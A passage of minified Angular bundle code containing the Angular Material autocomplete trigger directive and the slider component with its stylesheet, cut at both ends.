.mat-autocomplete-panel{outline:solid 1px}mat-autocomplete{display:none}"],encapsulation:2,changeDetection:0}),t})();const MV=new ni("mat-autocomplete-scroll-strategy"),w2e={provide:MV,deps:[As],useFactory:function x2e(t){return()=>t.scrollStrategies.reposition()}},I2e={provide:Ls,useExisting:ja(()=>vV),multi:!0};let R2e=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){this._element=e,this._overlay=i,this._viewContainerRef=n,this._zone=r,this._changeDetectorRef=c,this._dir=T,this._formField=k,this._document=q,this._viewportRuler=Y,this._defaults=te,this._componentDestroyed=!1,this._autocompleteDisabled=!1,this._manuallyFloatingLabel=!1,this._viewportSubscription=I.EMPTY,this._canOpenOnNextFocus=!0,this._closeKeyEventStream=new J,this._windowBlurHandler=()=>{this._canOpenOnNextFocus=this._document.activeElement!==this._element.nativeElement||this.panelOpen},this._onChange=()=>{},this._onTouched=()=>{},this.position="auto",this.autocompleteAttribute="off",this._overlayAttached=!1,this.optionSelections=rp(()=>{const pe=this.autocomplete?this.autocomplete.options:null;return pe?pe.changes.pipe(Ro(pe),Ur(()=>ra(...pe.map(Re=>Re.onSelectionChange)))):this._zone.onStable.pipe(Cn(1),Ur(()=>this.optionSelections))}),this._scrollStrategy=d}get autocompleteDisabled(){return this._autocompleteDisabled}set autocompleteDisabled(e){this._autocompleteDisabled=wi(e)}ngAfterViewInit(){const e=this._getWindow();void 0!==e&&this._zone.runOutsideAngular(()=>e.addEventListener("blur",this._windowBlurHandler))}ngOnChanges(e){e.position&&this._positionStrategy&&(this._setStrategyPositions(this._positionStrategy),this.panelOpen&&this._overlayRef.updatePosition())}ngOnDestroy(){const e=this._getWindow();void 0!==e&&e.removeEventListener("blur",this._windowBlurHandler),this._viewportSubscription.unsubscribe(),this._componentDestroyed=!0,this._destroyPanel(),this._closeKeyEventStream.complete()}get panelOpen(){return this._overlayAttached&&this.autocomplete.showPanel}openPanel(){this._attachOverlay(),this._floatLabel()}closePanel(){this._resetLabel(),this._overlayAttached&&(this.panelOpen&&this._zone.run(()=>{this.autocomplete.closed.emit()}),this.autocomplete._isOpen=this._overlayAttached=!1,this._pendingAutoselectedOption=null,this._overlayRef&&this._overlayRef.hasAttached()&&(this._overlayRef.detach(),this._closingActionsSubscription.unsubscribe()),this._componentDestroyed||this._changeDetectorRef.detectChanges())}updatePosition(){this._overlayAttached&&this._overlayRef.updatePosition()}get panelClosingActions(){return ra(this.optionSelections,this.autocomplete._keyManager.tabOut.pipe(Dn(()=>this._overlayAttached)),this._closeKeyEventStream,this._getOutsideClickStream(),this._overlayRef?this._overlayRef.detachments().pipe(Dn(()=>this._overlayAttached)):Bi()).pipe(Xe(e=>e instanceof IW?e:null))}get activeOption(){return this.autocomplete&&this.autocomplete._keyManager?this.autocomplete._keyManager.activeItem:null}_getOutsideClickStream(){return ra(Tc(this._document,"click"),Tc(this._document,"auxclick"),Tc(this._document,"touchend")).pipe(Dn(e=>{const i=Id(e),n=this._formField?this._formField._elementRef.nativeElement:null,r=this.connectedTo?this.connectedTo.elementRef.nativeElement:null;return this._overlayAttached&&i!==this._element.nativeElement&&this._document.activeElement!==this._element.nativeElement&&(!n||!n.contains(i))&&(!r||!r.contains(i))&&!!this._overlayRef&&!this._overlayRef.overlayElement.contains(i)}))}writeValue(e){Promise.resolve(null).then(()=>this._assignOptionValue(e))}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this._element.nativeElement.disabled=e}_handleKeydown(e){const i=e.keyCode,n=es(e);if(27===i&&!n&&e.preventDefault(),this.activeOption&&13===i&&this.panelOpen&&!n)this.activeOption._selectViaInteraction(),this._resetActiveItem(),e.preventDefault();else if(this.autocomplete){const r=this.autocomplete._keyManager.activeItem,c=38===i||40===i;9===i||c&&!n&&this.panelOpen?this.autocomplete._keyManager.onKeydown(e):c&&this._canOpen()&&this.openPanel(),(c||this.autocomplete._keyManager.activeItem!==r)&&(this._scrollToOption(this.autocomplete._keyManager.activeItemIndex||0),this.autocomplete.autoSelectActiveOption&&this.activeOption&&(this._pendingAutoselectedOption||(this._valueBeforeAutoSelection=this._element.nativeElement.value),this._pendingAutoselectedOption=this.activeOption,this._assignOptionValue(this.activeOption.value)))}}_handleInput(e){let i=e.target,n=i.value;"number"===i.type&&(n=""==n?null:parseFloat(n)),this._previousValue!==n&&(this._previousValue=n,this._pendingAutoselectedOption=null,this._onChange(n),this._canOpen()&&this._document.activeElement===e.target&&this.openPanel())}_handleFocus(){this._canOpenOnNextFocus?this._canOpen()&&(this._previousValue=this._element.nativeElement.value,this._attachOverlay(),this._floatLabel(!0)):this._canOpenOnNextFocus=!0}_handleClick(){this._canOpen()&&!this.panelOpen&&this.openPanel()}_floatLabel(e=!1){this._formField&&"auto"===this._formField.floatLabel&&(e?this._formField._animateAndLockLabel():this._formField.floatLabel="always",this._manuallyFloatingLabel=!0)}_resetLabel(){this._manuallyFloatingLabel&&(this._formField.floatLabel="auto",this._manuallyFloatingLabel=!1)}_subscribeToClosingActions(){return ra(this._zone.onStable.pipe(Cn(1)),this.autocomplete.options.changes.pipe(qr(()=>this._positionStrategy.reapplyLastPosition()),Z3(0))).pipe(Ur(()=>(this._zone.run(()=>{const n=this.panelOpen;this._resetActiveItem(),this.autocomplete._setVisibility(),this._changeDetectorRef.detectChanges(),this.panelOpen&&this._overlayRef.updatePosition(),n!==this.panelOpen&&(this.panelOpen?this.autocomplete.opened.emit():this.autocomplete.closed.emit())}),this.panelClosingActions)),Cn(1)).subscribe(n=>this._setValueAndClose(n))}_destroyPanel(){this._overlayRef&&(this.closePanel(),this._overlayRef.dispose(),this._overlayRef=null)}_assignOptionValue(e){const i=this.autocomplete&&this.autocomplete.displayWith?this.autocomplete.displayWith(e):e;this._updateNativeInputValue(null!=i?i:"")}_updateNativeInputValue(e){this._formField?this._formField._control.value=e:this._element.nativeElement.value=e,this._previousValue=e}_setValueAndClose(e){const i=e?e.source:this._pendingAutoselectedOption;i&&(this._clearPreviousSelectedOption(i),this._assignOptionValue(i.value),this._onChange(i.value),this.autocomplete._emitSelectEvent(i),this._element.nativeElement.focus()),this.closePanel()}_clearPreviousSelectedOption(e){this.autocomplete.options.forEach(i=>{i!==e&&i.selected&&i.deselect()})}_attachOverlay(){var e;let i=this._overlayRef;i?(this._positionStrategy.setOrigin(this._getConnectedElement()),i.updateSize({width:this._getPanelWidth()})):(this._portal=new Mm(this.autocomplete.template,this._viewContainerRef,{id:null===(e=this._formField)||void 0===e?void 0:e.getLabelId()}),i=this._overlay.create(this._getOverlayConfig()),this._overlayRef=i,this._handleOverlayEvents(i),this._viewportSubscription=this._viewportRuler.change().subscribe(()=>{this.panelOpen&&i&&i.updateSize({width:this._getPanelWidth()})})),i&&!i.hasAttached()&&(i.attach(this._portal),this._closingActionsSubscription=this._subscribeToClosingActions());const n=this.panelOpen;this.autocomplete._setVisibility(),this.autocomplete._isOpen=this._overlayAttached=!0,this.panelOpen&&n!==this.panelOpen&&this.autocomplete.opened.emit()}_getOverlayConfig(){var e;return new yg({positionStrategy:this._getOverlayPosition(),scrollStrategy:this._scrollStrategy(),width:this._getPanelWidth(),direction:this._dir,panelClass:null===(e=this._defaults)||void 0===e?void 0:e.overlayPanelClass})}_getOverlayPosition(){const e=this._overlay.position().flexibleConnectedTo(this._getConnectedElement()).withFlexibleDimensions(!1).withPush(!1);return this._setStrategyPositions(e),this._positionStrategy=e,e}_setStrategyPositions(e){const i=[{originX:"start",originY:"bottom",overlayX:"start",overlayY:"top"},{originX:"end",originY:"bottom",overlayX:"end",overlayY:"top"}],n=this._aboveClass,r=[{originX:"start",originY:"top",overlayX:"start",overlayY:"bottom",panelClass:n},{originX:"end",originY:"top",overlayX:"end",overlayY:"bottom",panelClass:n}];let c;c="above"===this.position?r:"below"===this.position?i:[...i,...r],e.withPositions(c)}_getConnectedElement(){return this.connectedTo?this.connectedTo.elementRef:this._formField?this._formField.getConnectedOverlayOrigin():this._element}_getPanelWidth(){return this.autocomplete.panelWidth||this._getHostWidth()}_getHostWidth(){return this._getConnectedElement().nativeElement.getBoundingClientRect().width}_resetActiveItem(){const e=this.autocomplete;e.autoActiveFirstOption?e._keyManager.setFirstItemActive():e._keyManager.setActiveItem(-1)}_canOpen(){const e=this._element.nativeElement;return!e.readOnly&&!e.disabled&&!this._autocompleteDisabled}_getWindow(){var e;return(null===(e=this._document)||void 0===e?void 0:e.defaultView)||window}_scrollToOption(e){const i=this.autocomplete,n=$w(e,i.options,i.optionGroups);if(0===e&&1===n)i._setScrollTop(0);else if(i.panel){const r=i.options.toArray()[e];if(r){const c=r._getHostElement(),d=RW(c.offsetTop,c.offsetHeight,i._getScrollTop(),i.panel.nativeElement.offsetHeight);i._setScrollTop(d)}}}_handleOverlayEvents(e){e.keydownEvents().subscribe(i=>{var n;(27===i.keyCode&&!es(i)||38===i.keyCode&&es(i,"altKey"))&&(this._pendingAutoselectedOption&&(this._updateNativeInputValue(null!==(n=this._valueBeforeAutoSelection)&&void 0!==n?n:""),this._pendingAutoselectedOption=null),this._closeKeyEventStream.next(),this._resetActiveItem(),i.stopPropagation(),i.preventDefault())}),e.outsidePointerEvents().subscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(As),Ee(fo),Ee(qi),Ee(Ma),Ee(MV),Ee(Cr,8),Ee(cb,9),Ee(ga,8),Ee(bm),Ee(bV,8))},t.\u0275dir=Ot({type:t,inputs:{autocomplete:["matAutocomplete","autocomplete"],position:["matAutocompletePosition","position"],connectedTo:["matAutocompleteConnectedTo","connectedTo"],autocompleteAttribute:["autocomplete","autocompleteAttribute"],autocompleteDisabled:["matAutocompleteDisabled","autocompleteDisabled"]},features:[sa]}),t})(),vV=(()=>{class t extends R2e{constructor(){super(...arguments),this._aboveClass="mat-autocomplete-panel-above"}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["input","matAutocomplete",""],["textarea","matAutocomplete",""]],hostAttrs:[1,"mat-autocomplete-trigger"],hostVars:7,hostBindings:function(e,i){1&e&&he("focusin",function(){return i._handleFocus()})("blur",function(){return i._onTouched()})("input",function(r){return i._handleInput(r)})("keydown",function(r){return i._handleKeydown(r)})("click",function(){return i._handleClick()}),2&e&&Rt("autocomplete",i.autocompleteAttribute)("role",i.autocompleteDisabled?null:"combobox")("aria-autocomplete",i.autocompleteDisabled?null:"list")("aria-activedescendant",i.panelOpen&&i.activeOption?i.activeOption.id:null)("aria-expanded",i.autocompleteDisabled?null:i.panelOpen.toString())("aria-owns",i.autocompleteDisabled||!i.panelOpen||null==i.autocomplete?null:i.autocomplete.id)("aria-haspopup",i.autocompleteDisabled?null:"listbox")},exportAs:["matAutocompleteTrigger"],features:[ki([I2e]),ci]}),t})(),AV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[w2e],imports:[bu,Q3,la,rn,uu,Q3,la]}),t})();const S2e=["sliderWrapper"],Ld=ym({passive:!1}),L2e={provide:Ls,useExisting:ja(()=>TV),multi:!0};class z2e{}const W2e=dp(Pd(Zc(class{constructor(t){this._elementRef=t}}),"accent"));let TV=(()=>{class t extends W2e{constructor(e,i,n,r,c,d,T,k){super(e),this._focusMonitor=i,this._changeDetectorRef=n,this._dir=r,this._ngZone=d,this._animationMode=k,this._invert=!1,this._max=100,this._min=0,this._step=1,this._thumbLabel=!1,this._tickInterval=0,this._value=null,this._vertical=!1,this.change=new Tt,this.input=new Tt,this.valueChange=new Tt,this.onTouched=()=>{},this._percent=0,this._isSliding=null,this._isActive=!1,this._tickIntervalPercent=0,this._sliderDimensions=null,this._controlValueAccessorChangeFn=()=>{},this._dirChangeSubscription=I.EMPTY,this._pointerDown=q=>{this.disabled||this._isSliding||!mb(q)&&0!==q.button||this._ngZone.run(()=>{this._touchId=mb(q)?function F2e(t,a){for(let e=0;e<t.touches.length;e++){const i=t.touches[e].target;if(a===i||a.contains(i))return t.touches[e].identifier}}(q,this._elementRef.nativeElement):void 0;const Y=DV(q,this._touchId);if(Y){const te=this.value;this._isSliding="pointer",this._lastPointerEvent=q,this._focusHostElement(),this._onMouseenter(),this._bindGlobalEvents(q),this._focusHostElement(),this._updateValueFromPosition(Y),this._valueOnSlideStart=te,q.cancelable&&q.preventDefault(),te!=this.value&&this._emitInputEvent()}})},this._pointerMove=q=>{if("pointer"===this._isSliding){const Y=DV(q,this._touchId);if(Y){q.cancelable&&q.preventDefault();const te=this.value;this._lastPointerEvent=q,this._updateValueFromPosition(Y),te!=this.value&&this._emitInputEvent()}}},this._pointerUp=q=>{"pointer"===this._isSliding&&(!mb(q)||"number"!=typeof this._touchId||v8(q.changedTouches,this._touchId))&&(q.cancelable&&q.preventDefault(),this._removeGlobalEvents(),this._isSliding=null,this._touchId=void 0,this._valueOnSlideStart!=this.value&&!this.disabled&&this._emitChangeEvent(),this._valueOnSlideStart=this._lastPointerEvent=null)},this._windowBlur=()=>{this._lastPointerEvent&&this._pointerUp(this._lastPointerEvent)},this._document=T,this.tabIndex=parseInt(c)||0,d.runOutsideAngular(()=>{const q=e.nativeElement;q.addEventListener("mousedown",this._pointerDown,Ld),q.addEventListener("touchstart",this._pointerDown,Ld)})}get invert(){return this._invert}set invert(e){this._invert=wi(e)}get max(){return this._max}set max(e){this._max=Uo(e,this._max),this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}get min(){return this._min}set min(e){this._min=Uo(e,this._min),this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}get step(){return this._step}set step(e){this._step=Uo(e,this._step),this._step%1!=0&&(this._roundToDecimal=this._step.toString().split(".").pop().length),this._changeDetectorRef.markForCheck()}get thumbLabel(){return this._thumbLabel}set thumbLabel(e){this._thumbLabel=wi(e)}get tickInterval(){return this._tickInterval}set tickInterval(e){this._tickInterval="auto"===e?"auto":"number"==typeof e||"string"==typeof e?Uo(e,this._tickInterval):0}get value(){return null===this._value&&(this.value=this._min),this._value}set value(e){if(e!==this._value){let i=Uo(e,0);this._roundToDecimal&&i!==this.min&&i!==this.max&&(i=parseFloat(i.toFixed(this._roundToDecimal))),this._value=i,this._percent=this._calculatePercentage(this._value),this._changeDetectorRef.markForCheck()}}get vertical(){return this._vertical}set vertical(e){this._vertical=wi(e)}get displayValue(){return this.displayWith?this.displayWith(this.value):this._roundToDecimal&&this.value&&this.value%1!=0?this.value.toFixed(this._roundToDecimal):this.value||0}focus(e){this._focusHostElement(e)}blur(){this._blurHostElement()}get percent(){return this._clamp(this._percent)}_shouldInvertAxis(){return this.vertical?!this.invert:this.invert}_isMinValue(){return 0===this.percent}_getThumbGap(){return this.disabled?7:this._isMinValue()&&!this.thumbLabel?this._isActive?10:7:0}_getTrackBackgroundStyles(){const i=this.vertical?`1, ${1-this.percent}, 1`:1-this.percent+", 1, 1";return{transform:`translate${this.vertical?"Y":"X"}(${this._shouldInvertMouseCoords()?"-":""}${this._getThumbGap()}px) scale3d(${i})`}}_getTrackFillStyles(){const e=this.percent,n=this.vertical?`1, ${e}, 1`:`${e}, 1, 1`;return{transform:`translate${this.vertical?"Y":"X"}(${this._shouldInvertMouseCoords()?"":"-"}${this._getThumbGap()}px) scale3d(${n})`,display:0===e?"none":""}}_getTicksContainerStyles(){return{transform:`translate${this.vertical?"Y":"X"}(${this.vertical||"rtl"!=this._getDirection()?"-":""}${this._tickIntervalPercent/2*100}%)`}}_getTicksStyles(){let e=100*this._tickIntervalPercent,d={backgroundSize:this.vertical?`2px ${e}%`:`${e}% 2px`,transform:`translateZ(0) translate${this.vertical?"Y":"X"}(${this.vertical||"rtl"!=this._getDirection()?"":"-"}${e/2}%)${this.vertical||"rtl"!=this._getDirection()?"":" rotate(180deg)"}`};if(this._isMinValue()&&this._getThumbGap()){const T=this._shouldInvertAxis();let k;k=this.vertical?T?"Bottom":"Top":T?"Right":"Left",d[`padding${k}`]=`${this._getThumbGap()}px`}return d}_getThumbContainerStyles(){const e=this._shouldInvertAxis();return{transform:`translate${this.vertical?"Y":"X"}(-${100*(("rtl"!=this._getDirection()||this.vertical?e:!e)?this.percent:1-this.percent)}%)`}}_shouldInvertMouseCoords(){const e=this._shouldInvertAxis();return"rtl"!=this._getDirection()||this.vertical?e:!e}_getDirection(){return this._dir&&"rtl"==this._dir.value?"rtl":"ltr"}ngAfterViewInit(){this._focusMonitor.monitor(this._elementRef,!0).subscribe(e=>{this._isActive=!!e&&"keyboard"!==e,this._changeDetectorRef.detectChanges()}),this._dir&&(this._dirChangeSubscription=this._dir.change.subscribe(()=>{this._changeDetectorRef.markForCheck()}))}ngOnDestroy(){const e=this._elementRef.nativeElement;e.removeEventListener("mousedown",this._pointerDown,Ld),e.removeEventListener("touchstart",this._pointerDown,Ld),this._lastPointerEvent=null,this._removeGlobalEvents(),this._focusMonitor.stopMonitoring(this._elementRef),this._dirChangeSubscription.unsubscribe()}_onMouseenter(){this.disabled||(this._sliderDimensions=this._getSliderDimensions(),this._updateTickIntervalPercent())}_onFocus(){this._sliderDimensions=this._getSliderDimensions(),this._updateTickIntervalPercent()}_onBlur(){this.onTouched()}_onKeydown(e){if(this.disabled||es(e)||this._isSliding&&"keyboard"!==this._isSliding)return;const i=this.value;switch(e.keyCode){case 33:this._increment(10);break;case 34:this._increment(-10);break;case 35:this.value=this.max;break;case 36:this.value=this.min;break;case 37:this._increment("rtl"==this._getDirection()?1:-1);break;case 38:this._increment(1);break;case 39:this._increment("rtl"==this._getDirection()?-1:1);break;case 40:this._increment(-1);break;default:return}i!=this.value&&(this._emitInputEvent(),this._emitChangeEvent()),this._isSliding="keyboard",e.preventDefault()}_onKeyup(){"keyboard"===this._isSliding&&(this._isSliding=null)}_getWindow(){return this._document.defaultView||window}_bindGlobalEvents(e){const i=this._document,n=mb(e),c=n?"touchend":"mouseup";i.addEventListener(n?"touchmove":"mousemove",this._pointerMove,Ld),i.addEventListener(c,this._pointerUp,Ld),n&&i.addEventListener("touchcancel",this._pointerUp,Ld);const d=this._getWindow();void 0!==d&&d&&d.addEventListener("blur",this._windowBlur)}_removeGlobalEvents(){const e=this._document;e.removeEventListener("mousemove",this._pointerMove,Ld),e.removeEventListener("mouseup",this._pointerUp,Ld),e.removeEventListener("touchmove",this._pointerMove,Ld),e.removeEventListener("touchend",this._pointerUp,Ld),e.removeEventListener("touchcancel",this._pointerUp,Ld);const i=this._getWindow();void 0!==i&&i&&i.removeEventListener("blur",this._windowBlur)}_increment(e){const i=this._clamp(this.value||0,this.min,this.max);this.value=this._clamp(i+this.step*e,this.min,this.max)}_updateValueFromPosition(e){if(!this._sliderDimensions)return;let c=this._clamp(((this.vertical?e.y:e.x)-(this.vertical?this._sliderDimensions.top:this._sliderDimensions.left))/(this.vertical?this._sliderDimensions.height:this._sliderDimensions.width));if(this._shouldInvertMouseCoords()&&(c=1-c),0===c)this.value=this.min;else if(1===c)this.value=this.max;else{const d=this._calculateValue(c),T=Math.round((d-this.min)/this.step)*this.step+this.min;this.value=this._clamp(T,this.min,this.max)}}_emitChangeEvent(){this._controlValueAccessorChangeFn(this.value),this.valueChange.emit(this.value),this.change.emit(this._createChangeEvent())}_emitInputEvent(){this.input.emit(this._createChangeEvent())}_updateTickIntervalPercent(){if(!this.tickInterval||!this._sliderDimensions)return;let e;if("auto"==this.tickInterval){let i=this.vertical?this._sliderDimensions.height:this._sliderDimensions.width;e=Math.ceil(30/(i*this.step/(this.max-this.min)))*this.step/i}else e=this.tickInterval*this.step/(this.max-this.min);this._tickIntervalPercent=EV(e)?e:0}_createChangeEvent(e=this.value){let i=new z2e;return i.source=this,i.value=e,i}_calculatePercentage(e){const i=((e||0)-this.min)/(this.max-this.min);return EV(i)?i:0}_calculateValue(e){return this.min+e*(this.max-this.min)}_clamp(e,i=0,n=1){return Math.max(i,Math.min(e,n))}_getSliderDimensions(){return this._sliderWrapper?this._sliderWrapper.nativeElement.getBoundingClientRect():null}_focusHostElement(e){this._elementRef.nativeElement.focus(e)}_blurHostElement(){this._elementRef.nativeElement.blur()}writeValue(e){this.value=e}registerOnChange(e){this._controlValueAccessorChangeFn=e}registerOnTouched(e){this.onTouched=e}setDisabledState(e){this.disabled=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(js),Ee(Ma),Ee(Cr,8),Vr("tabindex"),Ee(qi),Ee(ga),Ee(ar,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-slider"]],viewQuery:function(e,i){if(1&e&&Mi(S2e,5),2&e){let n;Vt(n=Bt())&&(i._sliderWrapper=n.first)}},hostAttrs:["role","slider",1,"mat-slider","mat-focus-indicator"],hostVars:29,hostBindings:function(e,i){1&e&&he("focus",function(){return i._onFocus()})("blur",function(){return i._onBlur()})("keydown",function(r){return i._onKeydown(r)})("keyup",function(){return i._onKeyup()})("mouseenter",function(){return i._onMouseenter()})("selectstart",function(r){return r.preventDefault()}),2&e&&(Gs("tabIndex",i.tabIndex),Rt("aria-disabled",i.disabled)("aria-valuemax",i.max)("aria-valuemin",i.min)("aria-valuenow",i.value)("aria-valuetext",null==i.valueText?i.displayValue:i.valueText)("aria-orientation",i.vertical?"vertical":"horizontal"),Ct("mat-slider-disabled",i.disabled)("mat-slider-has-ticks",i.tickInterval)("mat-slider-horizontal",!i.vertical)("mat-slider-axis-inverted",i._shouldInvertAxis())("mat-slider-invert-mouse-coords",i._shouldInvertMouseCoords())("mat-slider-sliding",i._isSliding)("mat-slider-thumb-label-showing",i.thumbLabel)("mat-slider-vertical",i.vertical)("mat-slider-min-value",i._isMinValue())("mat-slider-hide-last-tick",i.disabled||i._isMinValue()&&i._getThumbGap()&&i._shouldInvertAxis())("_mat-animation-noopable","NoopAnimations"===i._animationMode))},inputs:{disabled:"disabled",color:"color",tabIndex:"tabIndex",invert:"invert",max:"max",min:"min",step:"step",thumbLabel:"thumbLabel",tickInterval:"tickInterval",value:"value",displayWith:"displayWith",valueText:"valueText",vertical:"vertical"},outputs:{change:"change",input:"input",valueChange:"valueChange"},exportAs:["matSlider"],features:[ki([L2e]),ci],decls:13,vars:6,consts:[[1,"mat-slider-wrapper"],["sliderWrapper",""],[1,"mat-slider-track-wrapper"],[1,"mat-slider-track-background",3,"ngStyle"],[1,"mat-slider-track-fill",3,"ngStyle"],[1,"mat-slider-ticks-container",3,"ngStyle"],[1,"mat-slider-ticks",3,"ngStyle"],[1,"mat-slider-thumb-container",3,"ngStyle"],[1,"mat-slider-focus-ring"],[1,"mat-slider-thumb"],[1,"mat-slider-thumb-label"],[1,"mat-slider-thumb-label-text"]],template:function(e,i){1&e&&(m(0,"div",0,1)(2,"div",2),it(3,"div",3)(4,"div",4),u(),m(5,"div",5),it(6,"div",6),u(),m(7,"div",7),it(8,"div",8)(9,"div",9),m(10,"div",10)(11,"span",11),s(12),u()()()()),2&e&&(C(3),V("ngStyle",i._getTrackBackgroundStyles()),C(1),V("ngStyle",i._getTrackFillStyles()),C(1),V("ngStyle",i._getTicksContainerStyles()),C(1),V("ngStyle",i._getTicksStyles()),C(1),V("ngStyle",i._getThumbContainerStyles()),C(5),ke(i.displayValue))},dependencies:[Yv],styles:['.mat-slider{display:inline-block;position:relative;box-sizing:border-box;padding:8px;outline:none;vertical-align:middle}.mat-slider:not(.mat-slider-disabled):active,.mat-slider.mat-slider-sliding:not(.mat-slider-disabled){cursor:grabbing}.mat-slider-wrapper{-webkit-print-color-adjust:exact;color-adjust:exact;position:absolute}.mat-slider-track-wrapper{position:absolute;top:0;left:0;overflow:hidden}.mat-slider-track-fill{position:absolute;transform-origin:0 0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-track-background{position:absolute;transform-origin:100% 100%;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-ticks-container{position:absolute;left:0;top:0;overflow:hidden}.mat-slider-ticks{-webkit-background-clip:content-box;background-clip:content-box;background-repeat:repeat;box-sizing:border-box;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-thumb-container{position:absolute;z-index:1;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-focus-ring{position:absolute;width:30px;height:30px;border-radius:50%;transform:scale(0);opacity:0;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider.cdk-keyboard-focused .mat-slider-focus-ring,.mat-slider.cdk-program-focused .mat-slider-focus-ring{transform:scale(1);opacity:1}.mat-slider:not(.mat-slider-disabled):not(.mat-slider-sliding) .mat-slider-thumb-label,.mat-slider:not(.mat-slider-disabled):not(.mat-slider-sliding) .mat-slider-thumb{cursor:grab}.mat-slider-thumb{position:absolute;right:-10px;bottom:-10px;box-sizing:border-box;width:20px;height:20px;border:3px solid rgba(0,0,0,0);border-radius:50%;transform:scale(0.7);transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1),border-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-thumb-label{display:none;align-items:center;justify-content:center;position:absolute;width:28px;height:28px;border-radius:50%;transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1),border-radius 400ms cubic-bezier(0.25, 0.8, 0.25, 1),background-color 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.cdk-high-contrast-active .mat-slider-thumb-label{outline:solid 1px}.mat-slider-thumb-label-text{z-index:1;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-sliding .mat-slider-track-fill,.mat-slider-sliding .mat-slider-track-background,.mat-slider-sliding .mat-slider-thumb-container{transition-duration:0ms}.mat-slider-has-ticks .mat-slider-wrapper::after{content:"";position:absolute;border-width:0;border-style:solid;opacity:0;transition:opacity 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-slider-has-ticks.cdk-focused:not(.mat-slider-hide-last-tick) .mat-slider-wrapper::after,.mat-slider-has-ticks:hover:not(.mat-slider-hide-last-tick) .mat-slider-wrapper::after{opacity:1}.mat-slider-has-ticks.cdk-focused:not(.mat-slider-disabled) .mat-slider-ticks,.mat-slider-has-ticks:hover:not(.mat-slider-disabled) .mat-slider-ticks{opacity:1}.mat-slider-thumb-label-showing .mat-slider-focus-ring{display:none}.mat-slider-thumb-label-showing .mat-slider-thumb-label{display:flex}.mat-slider-axis-inverted .mat-slider-track-fill{transform-origin:100% 100%}.mat-slider-axis-inverted .mat-slider-track-background{transform-origin:0 0}.mat-slider:not(.mat-slider-disabled).cdk-focused.mat-slider-thumb-label-showing .mat-slider-thumb{transform:scale(0)}.mat-slider:not(.mat-slider-disabled).cdk-focused .mat-slider-thumb-label{border-radius:50% 50% 0}.mat-slider:not(.mat-slider-disabled).cdk-focused .mat-slider-thumb-label-text{opacity:1}.mat-slider:not(.mat-slider-disabled).cdk-mouse-focused .mat-slider-thumb,.mat-slider:not(.mat-slider-disabled).cdk-touch-focused .mat-slider-thumb,.mat-slider:not(.mat-slider-disabled).cdk-program-focused .mat-slider-thumb{border-width:2px;transform:scale(1)}.mat-slider-disabled .mat-slider-focus-ring{transform:scale(0);opacity:0}.mat-slider-disabled .mat-slider-thumb{border-width:4px;transform:scale(0.5)}.mat-slider-disabled .mat-slider-thumb-label{display:none}.mat-slider-horizontal{height:48px;min-width:128px}.mat-slider-horizontal .mat-slider-wrapper{height:2px;top:23px;left:8px;right:8px}.mat-slider-horizontal .mat-slider-wrapper::after{height:2px;border-left-width:2px;right:0;top:0}.mat-slider-horizontal .mat-slider-track-wrapper{height:2px;width:100%}.mat-slider-horizontal .mat-slider-track-fill{height:2px;width:100%;transform:scaleX(0)}.mat-slider-horizontal .mat-slider-track-background{height:2px;width:100%;transform:scaleX(1)}.mat-slider-horizontal .mat-slider-ticks-container{height:2px;width:100%}.cdk-high-contrast-active .mat-slider-horizontal .mat-slider-ticks-container{height:0;outline:solid 2px;top:1px}.mat-slider-horizontal .mat-slider-ticks{height:2px;width:100%}.mat-slider-horizontal .mat-slider-thumb-container{width:100%;height:0;top:50%}.mat-slider-horizontal .mat-slider-focus-ring{top:-15px;right:-15px}.mat-slider-horizontal .mat-slider-thumb-label{right:-14px;top:-40px;transform:translateY(26px) scale(0.01) rotate(45deg)}.mat-slider-horizontal .mat-slider-thumb-label-text{transform:rotate(-45deg)}.mat-slider-horizontal.cdk-focused .mat-slider-thumb-label{transform:rotate(45deg)}.cdk-high-contrast-active .mat-slider-horizontal.cdk-focused .mat-slider-thumb-label,.cdk-high-contrast-active .mat-slider-horizontal.cdk-focused .mat-slider-thumb-label-text{transform:none}.mat-slider-vertical{width:48px;min-height:128px}.mat-slider-vertical .mat-slider-wrapper{width:2px;top:8px;bottom:8px;left:23px}.mat-slider-vertical .mat-slider-wrapper::after{width:2px;border-top-width:2px;bottom:0;left:0}.mat-slider-vertical .mat-slider-track-wrapper{height:100%;width:2px}.mat-slider-vertical .mat-slider-track-fill{height:100%;width:2px;transform:scaleY(0)}.mat-slider-vertical .mat-slider-track-background{height:100%;width:2px;transform:scaleY(1)}.mat-slider-vertical .mat-slider-ticks-container{width:2px;height:100%}.cdk-high-contrast-active .mat-slider-vertical .mat-slider-ticks-container{width:0;outline:solid 2px;left:1px}.mat-slider-vertical .mat-slider-focus-ring{bottom:-15px;left:-15px}.mat-slider-vertical 